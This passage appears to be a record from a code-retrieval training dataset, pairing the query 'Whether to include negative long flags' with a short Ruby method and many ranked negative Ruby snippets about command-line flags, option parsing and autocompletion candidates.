"def flag(*names)\n names = [names].flatten\n verify_unused(names,flags,switches,\"in global options\")\n flag = Flag.new(names,@@next_desc,@@next_arg_name,@@next_default_value,@@next_long_desc)\n flags[flag.name] = flag\n clear_nexts\n end",
"def has_milliseconds?\n self.format(\"%L\").to_i > 0\n end",
"def describe_flags(flags,format)\n d = ''\n flags.keys.each { |f|\n if f=='c' then\n if format=='tex' then f=\"$\\\\int$\" end\n if format=='plain' then f=\"(calculus)\" end\n if format=='html' then f=\"∫\" end\n end\n if f=='s' && format=='tex' then f=\"${}_\\\\textup{s}$\" end\n d=d+f unless f=='o'\n }\n return d\nend",
"def format_boolean_flag(flag, small=false)\n css_small = small == true ? 'boolean-flag-xs' : ''\n if flag == true\n return \"<div class='boolean-flag boolean-flag-true #{css_small}'>#{t('shared.common.yes')}</div>\".html_safe\n else\n return \"<div class='boolean-flag boolean-flag-false #{css_small}'>#{t('shared.common.no')}</div>\".html_safe\n end\n end",
"def flag; end",
"def is_flagged?(feature)\n flags.include?feature\n end",
"def modifier_flags(include_shift = true)\n modifiers = self.modifiers.dup\n modifiers.delete(\"S\") unless include_shift\n flags = 0\n modifiers.each { |modifier| flags = flags | MODIFIER_MAP[modifier] }\n flags\n end",
"def scm_flags\n @flags.join(\" \")\n end",
"def short_binary_type; end",
"def flags_resync\n if @flags\n self.class.flag_def.each do |f|\n sym = (f.flag_type=='Symbol' ? f.flag_name.to_sym : f.flag_name)\n i,p,v = self.class.index_position_value(f.position)\n sn=self.send(\"flags_#{i}\")||0\n b = sn & v > 0\n logger.warn \"#{@flags[sym].class} value '#{@flags[sym]}' for flag #{self.class}->#{sym} will be stored as true, not '#{@flags[sym]}'\" unless FlaggableTypes.include?(@flags[sym].class)\n if @flags[sym] && !b\n self.send(\"flags_#{i}=\",sn+v)\n elsif b && !@flags[sym]\n self.send(\"flags_#{i}=\",sn-v)\n end\n end\n end\n @flags\n end",
"def append_long(l=nil)\n if l.class == Fixnum && !block_given?\n @j_del.java_method(:appendLong, [Java::long.java_class]).call(l)\n return self\n end\n raise ArgumentError, \"Invalid arguments when calling append_long(l)\"\n end",
"def argument_required?\n !short.to_s.match(SHORT_ARGUMENT_REQUIRED_RE).nil? ||\n !long.to_s.match(LONG_ARGUMENT_REQUIRED_RE).nil?\n end",
"def test_stringflag_as_flag\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w(--xyz )\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--xyz --abc)\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal true, opts[:abc]\n end"
] | [
"0.7245966",
"0.6807072",
"0.66324544",
"0.6364071",
"0.63171667",
"0.5945385",
"0.5848188",
"0.5839984",
"0.5796883",
"0.5730932",
"0.57299966",
"0.5712589",
"0.5686601",
"0.5647302",
"0.5640962",
"0.5616302",
"0.5598856",
"0.5587657",
"0.5584795",
"0.55703974",
"0.55698246",
"0.5500652",
"0.54964143",
"0.5475657",
"0.54638445",
"0.54574966",
"0.54553425",
"0.5454681",
"0.5432492",
"0.5425576",
"0.5404934",
"0.5400269",
"0.537551",
"0.53376216",
"0.5335956",
"0.5335956",
"0.5318401",
"0.5300844",
"0.5297963",
"0.5297963",
"0.5293146",
"0.5292293",
"0.5290225",
"0.52759063",
"0.5269776",
"0.5266675",
"0.52479446",
"0.5246082",
"0.5237311",
"0.5231419",
"0.5223346",
"0.5214367",
"0.52120256",
"0.5209599",
"0.5206147",
"0.51908755",
"0.5167918",
"0.51676214",
"0.5164993",
"0.51416093",
"0.5135795",
"0.5122374",
"0.51182216",
"0.5106318",
"0.50964427",
"0.5086301",
"0.50817555",
"0.5048646",
"0.50435877",
"0.5042795",
"0.5032195",
"0.5029026",
"0.50262016",
"0.50143313",
"0.49900952",
"0.4988057",
"0.4973309",
"0.49720025",
"0.4966722",
"0.49636012",
"0.49589786",
"0.4954308",
"0.49534756",
"0.4952699",
"0.4940554",
"0.49358672",
"0.4933695",
"0.49317908",
"0.49295786",
"0.49252146",
"0.49250853",
"0.49246624",
"0.49218985",
"0.49208254",
"0.4915261",
"0.49147373",
"0.49129903",
"0.4912756",
"0.4895225",
"0.48893264"
] | 0.7485818 | 0 |
Whether to include negative long flags | def include_negative?
@include_negative
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def flags\n [long, negative_long, short].compact\n end",
"def include_long?\n @include_long\n end",
"def flags\n [long, short].compact\n end",
"def long_flag_syntax\n @long_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :long }\n end",
"def general_purpose_flags\n 0b0000000000000000\n end",
"def general_purpose_flags\n 0b0000000000000001\n end",
"def long_for_optparse\n (arg and not(long.nil?)) ? (\"%s %s\" % [long, arg]) : long\n end",
"def complain_about_bad_flags?\n @complain_about_bad_flags\n end",
"def unique_flag_negative?\n found_unique? ? @flags.first[2] : nil\n end",
"def has_unlimited_flags?\n return true if is_approver?\n end",
"def flags; end",
"def get_flags( options )\n flags = 0\n if options[:flags] then\n if options[:flags].respond_to?(:each) then\n options[:flags].each { |f| flags = flags | f }\n else\n flags = options[:flags]\n end\n end\n return flags\n end",
"def negative?\n !!@negative\n end",
"def complain_about_bad_flags!\n @complain_about_bad_flags = true\n end",
"def negative?; end",
"def argument_optional?\n !short.to_s.match(SHORT_ARGUMENT_OPTIONAL_RE).nil? ||\n !long.to_s.match(LONG_ARGUMENT_OPTIONAL_RE).nil?\n end",
"def report_flags\n self.has_links? ? ret = \"L\" : ret = \"l\"\n self.has_jlinks? ? ret += \"J\" : ret += \"j\"\n self.has_form? ? ret += \"F\" : ret += \"f\"\n self.has_comments? ? ret += \"C\" : ret += \"c\"\n return ret\n end",
"def flag_more!\n if (!flag_more?)\n @flags = @flags | TAC_PLUS_ACCT_FLAG_MORE\n else\n @flags = @flags & (~TAC_PLUS_ACCT_FLAG_MORE) \n end\n return(nil)\n end",
"def neg?\n sign < 0\n end",
"def long_str # :nodoc:\n long ? Utils.prefix_long(long, '[no-]') : ''\n end",
"def flags?\n !@flags.empty?\n end",
"def negative?\n return self < 0\n end",
"def test_long\n LinuxFortune.long = true\n assert LinuxFortune.long # long should be set to short\n assert LinuxFortune.short == false # short to false\n assert LinuxFortune.fortune_options.include?(\"-l\")\n assert LinuxFortune.fortune_options.include?(\"-n\") || LinuxFortune.short_length == 160\n 5.times do # check multiple times if the generated length is ok\n lf = LinuxFortune.generate\n #puts \"#{lf.body.size} characters\"\n # TODO apparently there is an issue with 'fortune -l'; check fortune docs & bugs (manual mentions a different problem\n assert lf.body.size*1.1 >= LinuxFortune.short_length # check if actual size is greater than the max. short length\n end\n end",
"def pack_flags(flags)\n FLAGS.each_with_index.inject(0) do |memo,(key,i)|\n memo |= i if flags[key]\n memo\n end\n end",
"def chained_flags_with_signature(colmn = DEFAULT_COLUMN_NAME, *args)\n flags_to_collect = args.empty? ? all_flags(colmn) : args\n truthy_and_chosen =\n selected_flags(colmn).\n select { |flag| flags_to_collect.include?(flag) }\n truthy_and_chosen.concat(\n collect_flags(*flags_to_collect) do |memo, flag|\n memo << \"not_#{flag}\".to_sym unless truthy_and_chosen.include?(flag)\n end\n )\n end",
"def long_opt_symbol(args); end",
"def negative?\n self < 0\n end",
"def get_new_long?\n return self.new_long?\n end",
"def negative(num)\n return num<0\nend",
"def is_elflags?(); @type == GRT_ELFLAGS; end",
"def negative(num)\n is_neg = false\n if num < 0\n is_neg = true\n end\n return is_neg\nend",
"def negative?\n self < 0\n end",
"def negative?\n @negative\n end",
"def negative?\n @negative\n end",
"def parse_flags(obj, opt, args)\n x = opt.sub(/^-/, '')\n #c = 0\n x.split(//).each do |k|\n #if obj.respond_to?(\"#{k}=\")\n obj.send(\"#{k}=\", true)\n #else\n # obj.option_missing(x, true)\n #end\n end\n end",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def flags_before_args_enforced?\n @enforce_flags_before_args\n end",
"def flag _args\n \"flag _args;\" \n end",
"def is_num?\n @flags & NUM_FLAG != 0\n end",
"def is_num?\n @flags & NUM_FLAG != 0\n end",
"def validate_flags\n return if flags == [false, false, false, false]\n\n raise ProtocolException, \"Invalid flags in #{type_name} packet header\"\n end",
"def flag(short_name, long_name, description, &block)\n\t\t\treturn define_value(short_name, long_name, description, true, false, block)\n\t\tend",
"def flag(name,aliases,desc,long_desc,default_value,arg_name,must_match,type)\n abstract!\n end",
"def negative?() @positive==false end",
"def flags\n @values.fetch('flags') { \n @values['flags'] = nil\n }\n end",
"def has_add\n return @has_add unless @has_add.nil?\n @has_add = (flags & 32768) != 0\n @has_add\n end",
"def flag_more?()\n return(true) if(@flags & TAC_PLUS_ACCT_FLAG_MORE == TAC_PLUS_ACCT_FLAG_MORE)\n return(false)\n end",
"def nonnegative?\n return self >= 0\n end",
"def xlate_flags()\n return(\"Abort\") if (flag_abort?)\n return(\"None\")\n end",
"def negative?\n !@positive \n end",
"def is_negative(tal)\n if tal < 0\n return true\n else\n return false\n end\nend",
"def negative_test\r\n @negative = true\r\n end",
"def flag_unencrypted?()\n return(true) if(@flags & TAC_PLUS_UNENCRYPTED_FLAG == TAC_PLUS_UNENCRYPTED_FLAG)\n return(false)\n end",
"def negative? (numb)\n return false if numb > 0\n return true\nend",
"def flags(*args)\n Boxen::Flags.new *args\n end",
"def flags\n return @val\n end",
"def test_do_not_raise_when_int_is_not_wider_than_64bit\n value = 9223372036854775807\n assert_equal \"'9223372036854775807'\", @conn.quote(value)\n\n value = -9223372036854775808\n assert_equal \"'-9223372036854775808'\", @conn.quote(value)\n end",
"def read_long(signed = false, mut = :STD, order = :BIG)\n val = 0\n case order\n when :BIG\n (BYTE_SIZE * 7).downto(0) { |div| ((div % 8).zero? and div.positive?) ? val |= read_byte(signed) << div : next }\n val |= read_byte(signed, mut)\n when :LITTLE\n (0).upto(BYTE_SIZE * 7) { |div| ((div % 8).zero? and div.positive?) ? val |= read_byte(signed) << div: next }\n val |= read_byte(signed, mut)\n end\n val\n end",
"def flag_unencrypted!\n if (!flag_unencrypted?)\n @flags = @flags | TAC_PLUS_UNENCRYPTED_FLAG\n else\n @flags = @flags & (~TAC_PLUS_UNENCRYPTED_FLAG)\n end\n return(nil)\n end",
"def test_correct_neg_val_print\n a_parse = Argparser.new\n assert_output(nil) do\n _unused = a_parse.correct?([-20, -5, 0])\n end\n end",
"def modifier_flags(include_shift = true)\n modifiers = self.modifiers.dup\n modifiers.delete(\"S\") unless include_shift\n flags = 0\n modifiers.each { |modifier| flags = flags | MODIFIER_MAP[modifier] }\n flags\n end",
"def true_offset\n offset_flags >> 16\n end",
"def xlate_flags()\n return(\"No Echo\") if (flag_noecho?)\n return(\"None\")\n end",
"def make_flag(options)\n\tflagString=\" \"\n\tif(options.list != nil)\n\t\tflagString+=\" -l\"\n\tend\n\tif(options.all != nil)\n\t\tflagString+= \" -a\"\n\tend\n\treturn flagString\nend",
"def negative?\n self <= 0\n end",
"def reset_flags\n @flags = { :zero => false , :plus => false ,\n :minus => false , :overflow => false }\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def literal_false\n BOOL_FALSE\n end",
"def effective_flags\n @effective_flags ||= flag_syntax.flat_map(&:flags)\n end",
"def masking?; false; end",
"def folly_flags()\n return NewArchitectureHelper.folly_compiler_flags\nend",
"def build_flags(*flags)\n _flags = *flags\n\n unless _flags.is_a?(Integer)\n _flags = MAGIC_NONE\n\n flags.flatten.each { |flag|\n if value = flag.is_a?(Integer) ? flag : MAGIC_FLAGS[flag.to_sym]\n _flags |= value\n else\n raise ArgumentError, \"#{value.nil? ? 'no such flag' : 'flag not available'}: #{flag}\"\n end\n }\n end\n\n _flags\n end",
"def validate_flags\n return if @flags == [false, true, false, false]\n raise ProtocolException, 'Invalid flags in PUBREL packet header'\n end",
"def test_stringflag_unset\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w()\n assert_equal false, opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--abc)\n assert_equal false, opts[:xyz]\n assert_equal true, opts[:abc]\n end",
"def not(e)\n ((1 << 64) - 1) & (~eval_ex(e))\n end",
"def short_flag_exist?(flag)\n flags.select { |f| f.short == flag }.any?\n end",
"def negative?\n value < 0\n end",
"def flagged?\n !(%w(flagged) & flags).empty?\n end",
"def int64()\n # Read an unsigned value, then convert it to signed\n val = _uint64(\"int64\")\n\n val >= 2**63 ? -(2**64 - val): val\n end",
"def can_overflow?\n false\n end",
"def test_neg_check_fail\n assert_equal neg_check(['0', '-1', '0']), false # return false\n assert_equal neg_check(['0', '0', '-1']), false # return false\n assert_equal neg_check(['0', '-9', '-9']), false # return false\n end",
"def isnegative(siffra)\n output = false\n if siffra < 0\n output = true\n end\n\n return output\nend",
"def make_signed_int32(long); end",
"def flag_options\n return @flag_options unless @flag_options.nil?\n @flag_options = ''\n @flag_options << ' --auto-attach' if new_resource.auto_attach\n @flag_options << ' --force' if new_resource.force\n @flag_options << ' --insecure' if new_resource.insecure\n @flag_options\n end",
"def test_negative_should_have_the_right_option_count\n assert_equal(all_options.count, cli_options.count)\n end",
"def two_or_more\n -3\n end",
"def complete_flags?\n @complete_flags\n end",
"def flag_stop!\n if (!flag_stop?)\n @flags = @flags | TAC_PLUS_ACCT_FLAG_STOP\n else\n @flags = @flags & (~TAC_PLUS_ACCT_FLAG_STOP)\n end\n return(nil)\n end",
"def initialize(options={})\n super\n raise ArgumentError, \"arg_name specified for switch: #{arg_name}\" if arg_name\n raise ArgumentError, \"no long specified\" unless long\n @negative_long = Utils.prefix_long(long, 'no-')\n end",
"def is_negative(num)\n if num < 0\n return true\n end\n return false \nend",
"def feature_flags\n 0\n end",
"def is_negative(number)\n output = false\n if number < 0\n output = true\n end\n return output\nend",
"def options\n [['--build32', 'Force a 32-bit build.']]\n end",
"def local_options opts\n -1\n end",
"def is_negative(num)\n return false if num >= 0\n return true if num < 0\nend",
"def switches\n [long, negative_long, short].compact\n end",
"def test_stringflag_as_flag\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w(--xyz )\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--xyz --abc)\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal true, opts[:abc]\n end",
"def negative?\n self < ZERO\n end",
"def verification_flags=(_arg0); end"
] | [
"0.7005071",
"0.64586365",
"0.63733387",
"0.6301711",
"0.6210912",
"0.59782505",
"0.5870798",
"0.58574307",
"0.5744593",
"0.56635636",
"0.5610551",
"0.56060874",
"0.55889356",
"0.5546935",
"0.55281043",
"0.5511223",
"0.54754025",
"0.54588413",
"0.5454476",
"0.5445743",
"0.5418295",
"0.539358",
"0.5388296",
"0.5376985",
"0.53727",
"0.5371617",
"0.53623194",
"0.5353122",
"0.53491163",
"0.53490424",
"0.5344563",
"0.531543",
"0.5311942",
"0.5311942",
"0.53085804",
"0.53010106",
"0.53010106",
"0.52782357",
"0.5276066",
"0.5243675",
"0.5243675",
"0.5240085",
"0.51952255",
"0.5194592",
"0.51820475",
"0.5175899",
"0.5174165",
"0.5155009",
"0.51548386",
"0.5153348",
"0.5153341",
"0.515332",
"0.5150798",
"0.51467294",
"0.51405865",
"0.5134538",
"0.512591",
"0.51251113",
"0.51235664",
"0.5119556",
"0.51169837",
"0.5112999",
"0.5108587",
"0.5102974",
"0.5101413",
"0.50976646",
"0.50930303",
"0.50925094",
"0.5091668",
"0.5089132",
"0.5087605",
"0.50825036",
"0.5080679",
"0.5076475",
"0.5063017",
"0.5056649",
"0.5055299",
"0.50546116",
"0.5044141",
"0.5040847",
"0.50354564",
"0.50248647",
"0.5024851",
"0.5024025",
"0.5016979",
"0.5005984",
"0.5005958",
"0.500239",
"0.49975324",
"0.49932992",
"0.49846774",
"0.4983643",
"0.49793792",
"0.4978184",
"0.49706894",
"0.49635243",
"0.49578908",
"0.4955199",
"0.49550232",
"0.4946841"
] | 0.5779511 | 8 |
Returns candidates for the current completion. | def call(context)
results =
if @include_short && @include_long && @include_negative
@flag.effective_flags
else
collect_results
end
fragment = context.fragment
results.find_all { |val| val.start_with?(fragment) }
.map { |str| Completion::Candidate.new(str) }
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def candidates\n players.map(&:candidate).compact\n end",
"def candidates(s)\n res = []\n candidates_helper(s, 0, res)\n res\n end",
"def find_candidates\n scout(exp: expression, depth: 0)\n end",
"def file_candidates\n @file_candidates ||= []\n end",
"def qualified_candidates(candidates)\n\tcandidates.select do |candidate|\n\t\tqualified?(candidate)\n\tend\nend",
"def qualified_candidates(candidates)\n qualified_candidates = []\n candidates.each do |candidate|\n if experienced?(candidate) && github(candidate) && languages(candidate) && applydate(candidate) && applyage(candidate)\n qualified_candidates << candidate\n end\n end\n return qualified_candidates\nend",
"def possible_completions(token)\n start_position = redis.zrank(completion_set, token)\n return [] unless start_position\n redis.zrange(\n completion_set,\n start_position,\n start_position + 49\n )\n end",
"def candidates\n players = []\n players += Player.where(:position => \"QB\").first(20)\n players += Player.where(:position => \"RB\").first(20)\n players += Player.where(:position => \"WR\").first(20)\n players\n end",
"def by_candidate\n placements =\n by_target.to_a.flat_map { |t, cs| cs.map { |c| [c, t] } }.to_h\n candidates.map { |c| [c.object, placements[c.object]] }.to_h.freeze\n end",
"def max_candidates\n return @max_candidates\n end",
"def matchingCandidates(token)\n candidates(@currentNode, token)\n end",
"def call(context)\n candidates = valued_flag_candidates(context)\n return candidates if candidates\n candidates = subtool_or_arg_candidates(context)\n candidates += plain_flag_candidates(context)\n candidates += flag_value_candidates(context)\n if delegation_target\n delegate_tool = context.cli.loader.lookup_specific(delegation_target)\n if delegate_tool\n context = context.with(previous_words: delegation_target)\n candidates += delegate_tool.completion.call(context)\n end\n end\n candidates\n end",
"def qualified_candidates(candidates)\n begin\n @candidates.select do |candidate|\n experienced?(candidate) &&\n enough_points?(candidate) &&\n proper_languages?(candidate) &&\n applied_recently?(candidate) &&\n old_enough?(candidate)\n end\n rescue CandidateError => ex\n puts \"There was an error in finding qualified candidates. The reason was #{ex.message}\"\n end\nend",
"def active_job_candidate_list\n @job_candidates = JobCandidate.active_job_candidate_list(current_candidate)\n end",
"def candidate\n candidates.first\n end",
"def qualified_candidates(candidates)\n puts \"Candidates that meet your specs:\"\n\n qualified = candidates.select do |c|\n experienced?(c)\n has_enough_github_pts?(c) &&\n has_right_languages?(c) &&\n applied_within_15_days?(c) &&\n is_of_age?(c)\n end\nend",
"def completions_for(token)\n results = []\n possible_completions(token).each do |entry|\n return results unless matches?(token, entry)\n if complete_word?(entry)\n results << entry\n return results if entry == token\n end\n end\n results\n end",
"def qualified_candidates(candidates)\n array = []\n candidates.each do |candidate| \n if experience?(candidate) && languages?(candidate) && last_15_days?(candidate) && over_17?(candidate)\n array << candidate\n end\n end\n array\nend",
"def get_completions(prefix)\n return []\n end",
"def suggest(options)\n candidates_to_exclude = options[:exclude]\n validation_block = options[:validate]\n number_of_suggestions = options[:num_suggestions]\n\n results = []\n candidates = name_combinations.clone\n while results.size < number_of_suggestions && !candidates.blank?\n candidate = candidates.shift\n if validation_block.try(:call, candidate)\n # Don't add the candidate to result\n elsif candidates_to_exclude.include? candidate\n candidates << find_extended_candidate(candidate, candidates_to_exclude)\n else\n results << candidate\n end\n end\n\n results\n end",
"def method_completions\n\n return if @method_completions.empty?\n @method_completions.uniq.sort\n\n end",
"def remaining_candidates\n case strategy.to_sym\n when :symmetric\n candidates.reject { | candidate | candidate.full? || candidate.exhausted_preferences? }\n when :asymmetric\n candidate_set1.values.reject { | candidate | candidate.full? || candidate.exhausted_preferences? }\n end\n end",
"def run\n while ( rcs = remaining_candidates ).any?\n rcs.each do | candidate |\n while !candidate.exhausted_preferences? && candidate.free?\n candidate.propose_to_next_preference\n end\n end\n end\n self\n end",
"def qualified_candidates(candidate_list)\n candidate_list.select {|candidate| qualified?(candidate)}\nend",
"def perform\n candidates.each { |candidate| propose(candidate) }\n @matches\n end",
"def suggest(options)\n candidates_to_exclude = options[:exclude]\n number_of_suggestions = options[:num_suggestions]\n\n results = []\n candidates = name_combinations.clone\n while results.size < number_of_suggestions && !candidates.blank?\n candidate = candidates.shift\n if candidate.length <= 4\n # Don't add the candidate to result\n elsif candidates_to_exclude.include? candidate\n candidates << find_extended_candidate(candidate, candidates_to_exclude)\n else\n results << candidate\n end\n end\n\n results\n end",
"def protocol_completion\n return protocol_completion_without_future if instance_options[:with_protocol_completion]\n\n []\n end",
"def completion_callback( input )\n\t\tself.log.debug \"Input completion: %p\" % [ input ]\n\t\tparts = Shellwords.shellwords( input )\n\n\t\t# If there aren't any arguments, it's command completion\n\t\tif parts.length == 1\n\t\t\t# One completion means it's an unambiguous match, so just complete it.\n\t\t\tpossible_completions = @command_table.keys.grep( /^#{Regexp.quote(input)}/ ).sort\n\t\t\tself.log.debug \" possible completions: %p\" % [ possible_completions ]\n\t\t\treturn possible_completions\n\t\telse\n\t\t\tincomplete = parts.pop\n\t\t\tself.log.warn \"I don't yet do programmable or file completion.\"\n\t\t\treturn []\n\t\tend\n\tend",
"def known_suggestions\n @known_suggestions ||= SUGGESTIONS.constants.map do |suggestion_class|\n SUGGESTIONS.const_get(suggestion_class).new\n end\n end",
"def swing_candidates\n @result = Election.find_swing()\n puts @result\n end",
"def complete(search); Bond::DefaultMission.completions; end",
"def set_candidates(pv)\n @candidates = pv\n @value = @initial_value\n end",
"def get_candidates(consistent_read)\n candidates = []\n params = {\n table_name: candidates_table_name,\n consistent_read: consistent_read\n }\n\n loop do\n result = @database.scan(params)\n\n # Convert votes to an integer and add the candidate to the candidates array.\n result.items.each do |candidate|\n candidate['votes'] = candidate['votes'].to_i\n candidate['contributions'] = candidate['contributions'].to_i\n candidates << candidate\n end\n\n break if result.last_evaluated_key.nil?\n\n params[:exclusive_start_key] = result.last_evaluated_key\n end\n\n candidates\n end",
"def get_candidates\n\t$cand_table.each do |x|\n\t\tputs \"Give me a candidate name:\"\n\t\tx[0] = gets.chomp\n\tend\nend",
"def remaining_candidates\n @candidate_deck - candidates\n end",
"def selection( )\n if @completion.is_a?(Array)\n @completion\n elsif [File, Pathname].include?(@completion)\n Dir[File.join(@directory.to_s, @glob)].map do |file|\n File.basename(file)\n end\n else\n [ ]\n end\n end",
"def get_next_scent_candidates(priority, completed_training)\n # ------------------------------------------------------------------\n # priority : Integer, option parameter\n # completed_training: Smell_Program instance which is being replaced\n #\n # Priority for automatic selection of new scents:\n # 1 - new scents in a different category\n # 2 - new scents in the same category\n # 3 - new scents in any category\n # 4 - paused scents in different category\n # 5 - paused scents in same category\n # 6 - paused scents in any category\n #\n # returns : Array of Scent instances\n # ------------------------------------------------------------------\n case priority\n when 1 then inactive_scents_by_category(inactive_scent_categories)\n when 2 then inactive_scents_by_category(completed_training.scent.category)\n when 3 then Scent.all - scents\n when 4 then scents_by_category_and_status(inactive_scent_categories, \"pending\")\n when 5 then scents_by_category_and_status(completed_training.scent.category, \"pending\")\n when 6 then scents_by_category_and_status(Scent.categories, \"pending\")\n else []\n end\n end",
"def suggest_results\n repository.auto_suggest(suggest_handler_path, request_params)\n end",
"def qualified_candidates(list_of_candiates)\n sort_all_candidates(list_of_candiates.select do |person|\n experienced?(person) \\\n && over_requisite_github_points(person, REQ_GITHUB_PTS) \\\n && has_required_languages(person, LANGUAGE_LIST) \\\n && applied_during_right_period(person, APPLIED_WITHIN_DAYS) \\\n && of_age?(person, AGE_OVER)\n end)\nend",
"def suggestions\n # If we haven't registered an autocomplete, just return the empty set\n return [] if @autocomplete_config.nil?\n Dromedary::Suggest::Response.new suggest_results, request_params, autocomplete_config\n end",
"def build!\n set1.each do | target , options |\n candidate =\n Candidate.new \\\n target,\n *( options.first.is_a?( Array ) ? options : [ options ] )\n\n candidates.push candidate\n candidate_set1[ target ] = candidate\n end\n\n set2.each do | target , options |\n candidate =\n Candidate.new \\\n target,\n *( options.first.is_a?( Array ) ? options : [ options ] )\n\n candidates.push candidate\n candidate_set2[ target ] = candidate\n end\n\n candidate_set1.each do | target , candidate |\n candidate.preferences =\n candidate.raw_preferences.map { | preference_target | candidate_set2[ preference_target ] }\n end\n\n candidate_set2.each do | target , candidate |\n candidate.preferences =\n candidate.raw_preferences.map { | preference_target | candidate_set1[ preference_target ] }\n end\n\n # We've built the candidates\n self.built = true\n end",
"def autocomplete_results\n return @results if @results\n return cached_results if cached?\n\n @results = search_words.flat_map do |word|\n completions_for(word).flat_map { |token| fetch_results(token) }\n end\n @results = sorted_results(@results).first(limit)\n cache_results(@results)\n @results\n end",
"def candidate\n @candidate\n end",
"def awaiting_candidate_events\n candidate_events.select(&:awaiting_candidate?)\n end",
"def list_candidates(path, options = { })\n return path.map { |p| list_candidates(p, options) } if path.is_a?(Array)\n\n command_line = [ '-l' ]\n command_line << '-r' if options[:recursive]\n command_line << '-v' if (verbose = options[:verbose])\n command_line << '-D' if options[:debug]\n\n stripe_group = options[:stripe_group]\n command_line << '-G' << stripe_group if stripe_group\n\n affinity_key = options[:affinity_key]\n command_line << '-K' << affinity_key if affinity_key\n\n minimum_extents = options[:minimum_extents]\n command_line << '-m' << minimum_extents if minimum_extents\n\n command_line << path\n raw_response = execute(command_line)\n return raw_response if options.fetch(:return_raw_response, return_raw_response)\n\n raise raw_response if raw_response.start_with?('Error: ')\n\n candidates = [ ]\n raw_response.each_line { |c| _c = c.strip; next if c.empty? or c.nil?; candidates << _c }\n\n candidates.compact!\n\n return candidates unless verbose and options.fetch(:parse_verbose_data, parse_verbose_data)\n\n candidates.map do |c|\n match = /(.*):\\s?(\\d+)\\sextent[s]?:\\s?(.*)/.match(c)\n next unless match\n { :path => $1, :extent_count => $2, :message => $3}\n end.compact\n end",
"def lookup_completion(name)\n @completions.fetch(name.to_s) { |k| @parent ? @parent.lookup_completion(k) : nil }\n end",
"def results\n @mutex.synchronize do\n resolvables = @resolvables\n @resolvables = []\n return resolvables\n end\n end",
"def rl_possible_completions(ignore, invoking_key)\r\n rl_complete_internal('?')\r\n end",
"def completion_list\n groups = ::Guard.groups.map { |group| group.name.to_s }\n guards = ::Guard.guards.map { |guard| guard.class.to_s.downcase.sub('guard::', '') }\n\n COMPLETION_ACTIONS + groups + guards - ['default']\n end",
"def index\n @completions = Completion.all\n end",
"def map_current_candidates\n\t\tobj = Candidate.all\n\t\tobj.map { |i| {i.id => i.name} }\n\tend",
"def find_selected\n selected_quests = self.user_quests.where(complete: false)\n selected_quests.map do |x|\n x.quest_id\n end\n end",
"def candidate\n self['candidate']\n end",
"def find *args, &block\n found = []\n found << tasks.first if args.empty?\n if args.include? 'all'\n found = tasks\n elsif args.include? 'first'\n found << tasks.first\n elsif args.include? 'last'\n found << tasks.last\n elsif args.include?('complete') || args.include?('completed')\n found = tasks.select { |task| task.complete? }\n elsif args.include? 'incomplete'\n found = tasks.select { |task| not task.complete? }\n elsif args.any? { |arg| arg =~ /(\\d+)\\.\\.(-?\\d+)/ }\n found = tasks[$1.to_i..$2.to_i]\n else\n tasks.each_with_index do |task, i|\n found << task if args.any? { |a| a.to_i == i }\n end\n end\n found.each_with_index do |task, i|\n yield task, i\n end\n end",
"def search\n @start = starting_point\n return [] if start.nil?\n while continue_search?\n result = iterate\n break if early_trigger?(result)\n end\n results\n end",
"def get_candidate_list\n raise NoMethodError, 'get_candidate_list should be defined in subclass of HillClimb'\n end",
"def suggestions\n response.try(:[], \"suggest\").try(:[], @suggest_key).try(:[], request_params[:q]).try(:[], \"suggestions\") || []\n end",
"def suggestions\n perform_request_with_collection(:get, '/api/v1/accounts/suggestions', {}, Mastodon::Account)\n end",
"def fast_suggestions query\n return []\n end",
"def candidate_paths\n # All leaf categories for this product family. This is an array\n # of hashes. Each hash has keys :catid and :path.\n candidates = self.product_family.leaf_category_paths\n\n # All leaf category ids that were previously selected for this\n # product. This will be a subset of the candidates.\n current = self.leaf_ids\n\n candidates.each do |lcp|\n if current.include? lcp[:catid]\n lcp.merge! :selected => true\n else\n lcp.merge! :selected => false\n end\n end\n candidates\n end",
"def final_completed_assignments \n self.all_completed_assignments.select {|a| a.current }\n end",
"def getCandidates (data, len)\n\t\tresult = Array.new\n\t\tdata.each do |s|\n\t\t\tlst = Array.new\n\t\t\tsumChars = self.charsSum (s)\n\n\t\t\tprep = s.split(//).collect{|x| repeat(self.letterToInt(x),\"1\")} #list of blocks\n\n\t\t\tself.genSequence(prep, len - sumChars + 1).each do |r|\n\t\t\t\tbits = r[1,r.size-1].split(//)\n\t\t\t\tbitset = Array.new(bits.size,false)\n\t\t\t\tfor i in 0...bits.size\n\t\t\t\t\tbitset[i] = (bits[i]=='1')\n\t\t\t\tend\n\t\t\t\tlst.push(bitset)\n\t\t\tend\n\t\t\tresult.push(lst)\n\t\tend\n\t\treturn result\n\tend",
"def index\n @candidates = Candidate.where(user_id: current_user.id)\n end",
"def suggest_results\n Blacklight.default_index.connection.send_and_receive(suggest_handler_path, params: request_params)['suggest']\n end",
"def suggest_completion_venues(params, callbacks = {}, &block)\n return unless params[:query].length > 2\n request(:get, \"venues/suggestcompletion\", params, callbacks) do |response|\n block.call(response[\"minivenues\"])\n end\n end",
